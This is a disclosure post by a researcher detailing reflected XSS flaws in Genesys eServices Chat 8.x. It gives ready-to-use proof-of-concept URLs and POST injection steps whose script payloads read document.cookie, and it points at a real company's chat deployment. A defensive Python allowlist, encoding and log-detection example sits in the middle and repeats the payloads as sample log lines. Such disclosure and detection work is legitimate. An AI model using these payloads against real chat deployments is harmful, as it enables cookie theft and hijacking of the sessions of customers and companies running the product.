Hi all,
My name is Luis Eduardo Jácome V. (a.k.a. Mortal_Poison) and I found a vulnerability (gXSS and pXSS) in Genesys eServices Chat that affects versions 8.x.x.
First of all, if you find Genesys eServices Chat with "<!-- Version 8.1.200.03 -->" in the HTML source, it is vulnerable:
A small PoC (for versions 8.1.x):
https://example.com/HtmlChatPanel.jsp?Email=%3C/Script/%3E%3CScript/%3E(confirm)(document.cookie)%3C/Script/%3E
http://example.com/HtmlChatFrameSet.jsp?email=%3C/Script/%3E%3CScript/%3E(confirm)(1)%3C/Script/%3E
https://example.com/HtmlChatPanel.jsp?ActionColor=%3C/Script/%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E&ClientNickNameColor=%3C/SCRIPT/%3E&AgentNickNameColor=008000&ClientMessageColor=1532a0&AgentMessageColor=708090&Logo=.%2FResource%2FImages%2Flogo.jpg&FontSize=3&FontName=arial&ShowSmiles=1&BackgroundColor=FFFFFF
The problem is that the application does not correctly sanitize the form values (HtmlChatFrameSet.jsp and/or HtmlChatPanel.jsp) before reflecting them into the page.
The vulnerable file changes depending on the version of Genesys eServices Chat; however, in none of the versions is the form validated.
For versions whose HTML source contains "<!-- Version 8.1.000.07 -->", the following payload applies:
https://example.com/HtmlChatPanel.jsp?ActionColor=%3C/Script/%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E&ClientNickNameColor=%3C/SCRIPT/%3E&AgentNickNameColor=008000&ClientMessageColor=1532a0&AgentMessageColor=708090&Logo=.%2FResource%2FImages%2Flogo.jpg&FontSize=3&FontName=arial&ShowSmiles=1&BackgroundColor=FFFFFF
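The root cause above is reflecting query parameters into HTML without validation or encoding. The following is an added example, not Genesys code, showing the defender's side: an allowlist for the colour and layout parameters named in the PoC URLs, output encoding for free-text fields such as Email, and a check that runs the same allowlist over constructed access-log lines to spot requests carrying markup. The parameter rules are an assumed policy, and the log lines are constructed for the example.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs
# Allowlist per parameter name, taken from the HtmlChatPanel.jsp query string quoted
# on this page. The rules themselves are an assumed policy, not Genesys' own.
HEX6 = re.compile(r"[0-9A-Fa-f]{6}")
PARAM_RULES = {name: HEX6 for name in (
    "ActionColor", "ClientNickNameColor", "AgentNickNameColor",
    "ClientMessageColor", "AgentMessageColor", "BackgroundColor")}
PARAM_RULES.update({
    "FontSize": re.compile(r"\d{1,3}(px)?"),
    "FontName": re.compile(r"[A-Za-z ]{1,32}"),
    "ShowSmiles": re.compile(r"[01]"),
})
# Free-text fields that must be HTML-encoded on output rather than allowlisted.
FREE_TEXT = {"Email", "email", "email_address"}

def invalid_params(query: str) -> dict:
    """{name: decoded value} for params failing their rule, or free-text params carrying HTML metacharacters."""
    bad = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            rule = PARAM_RULES.get(name)
            if rule and not rule.fullmatch(value):
                bad[name] = value
            elif name in FREE_TEXT and re.search(r"[<>\"']", value):
                bad[name] = value
    return bad

def safe_color(value: str, default: str = "000000") -> str:  # fix for colour fields: allowlist
    return value if HEX6.fullmatch(value) else default

def safe_text(value: str) -> str:  # fix for free-text fields: HTML-encode before reflecting
    return html.escape(value, quote=True)

# Constructed access-log lines (not from the page), "METHOD path status" per line.
SAMPLE_LOG = """\
GET /HtmlChatPanel.jsp?ActionColor=080008&ClientNickNameColor=000019&FontSize=13px&ShowSmiles=0 200
GET /HtmlChatPanel.jsp?ActionColor=%3C/Script/%3E%3CSvg/OnLoad=(confirm)(1)%3E&FontSize=3 200
GET /HtmlChatPanel.jsp?Email=%3C/Script/%3E%3CScript/%3E(confirm)(document.cookie)%3C/Script/%3E 200
"""

def suspicious_requests(log_text: str) -> list:
    """Detection: (line number, offending params) for each logged request failing the checks."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        parts = line.split()
        bad = invalid_params(urlsplit(parts[1]).query) if len(parts) >= 2 else {}
        if bad:
            hits.append((n, bad))
    return hits
```

Running `suspicious_requests(SAMPLE_LOG)` flags lines 2 and 3 and leaves the legitimate request on line 1 alone.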
If the request is made with the POST method, you should see something like the following (it may vary depending on the form fields):
cmd=connect&chat_alias=&first_name=null&last_name=null&email_address=%INJECT_HERE%&celular=null&subject=null&msg2send=&secure_key=&user_id=&script_pos=&session_id=&timeZoneOffset=-300
In place of %INJECT_HERE% you inject the payload, for example: </Script/><Script/>(confirm)(1)</Script/>
Insert it without the "%" characters.
Remember that you must capture the request with an application that intercepts requests; in my case, BurpSuite.
The product is used by many companies; however, not all of them are indexed by search engines.
https://example.com/HtmlChatPanel.jsp?ActionColor=080008&ClientNickNameColor=000019&AgentNickNameColor=0a82d8&ClientMessageColor=030717&AgentMessageColor=0074ce&Logo=https%3A%2F%2Fcontact.falabella.com%2FWebAPI812%2FSODIMAC_AR%2FChat%2FResources%2FImages%2Flogo.jpg&FontSize=13px&FontName=arial&ShowSmiles=0&BackgroundColor=FFFFFF
Contact:
Twitter: @Mortal_Poison_
Youtube: https://youtube.com/XecureLabs
Web Page: https://xecure-labs.com
Affected versions:
Genesys eServices Chat 8.x.x
Tested on:
Firefox 50.0 and 60.0